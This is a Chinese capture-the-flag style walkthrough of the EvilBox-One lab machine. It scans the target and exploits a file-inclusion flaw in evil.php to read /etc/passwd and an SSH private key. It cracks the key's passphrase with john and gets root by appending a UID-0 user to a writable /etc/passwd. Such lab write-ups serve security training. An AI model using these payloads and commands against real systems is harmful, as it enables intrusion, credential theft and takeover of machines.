- 系统
Kali2023
EvilBox---One靶场
- 网页渗透
1、靶机信息收集
首先我们搭建好靶场后发现没有获取到IP,我们需要进行修改密码,再启动界面一直按e,进行修改:
修改成功后重启进行登录,并使用dhclient获取IP:
2. 端口探测:
发现22和80端口。
3.访问192.168.129.134
4、使用fscan进行扫描:
依次访问这些端口,发现并由没什么有效信息。
5、使用dirsearch进行扫描敏感目录:
6、通过访问robots.txt我们知道了用户名:
7、访问secret:
发现secret什么也没有,我们再次使用御剑进行扫描:
或:
gobuster dir -u http://192.168.129.134/secret/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
发现evil.php,我们进行访问:
依旧什么也没有。
8、evil.php的名字很可疑,对他进行进一步的探索:发现存在文件包含
wfuzz -c -w /usr/share/wordlists/wfuzz/general/megabeast.txt -u http://192.168.129.134/secret/evil.php?FUZZ=/etc/passwd --hh 0
发现command,进行访问:
http://192.168.129.134/secret/evil.php?command=/etc/passwd
因为扫描到ssh服务,所以看用户有没有id_rsa:
http://192.168.129.134/secret/evil.php?command=/home/mowree/.ssh/id_rsa
查看公钥访问:
192.168.129.134/secret/evil.php?command=../../../../../home/mowree/.ssh/authorized_keys这是默认的ssh保存公钥的位置。
9、使用为协议:
http://192.168.129.134/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
进行base64解密:
将id-rsa下载到kali,生成hash文件:python3 ssh2john.py /root/Desktop/id-rsa > hash.txt
现在使用john 破解密码:john --wordlist=/usr/share/john/password.lst hash.txt
修改权限:chmod 600 id-rsa
进行登录发下还是需要密码。
由于之前的id-sra是在网页直接复制的所以不行,我们需要通过靶机将id-rsa放在网站根目录,使用kali通过wget下载到kali;
10、登录:ssh mowree@192.168.129.134 -i id_rsa
11、第一个flag
三、提权
进行反弹:
反弹成功。
a.内核提权:
查看内核版本信息:
尝试后发现无法使用内核提权。
b.sudo提权:
无法使用。
c.suid提权:
无法使用。
d.passwd提权:
Find查找可写的文件:find / -writable 2>/dev/null | grep -v proc
发现/etc/passwd;
e.passwd提权:
生成密码:openssl passwd -1 -salt ss 123456
在/etc/passwd写入:echo 'ss:$1$ss$1FgHzjlKXjANZgnOPToOk/:0:0:root:/root:/bin/bash' >> /etc/passwd
进行登录:
提权成功。
发现flag2: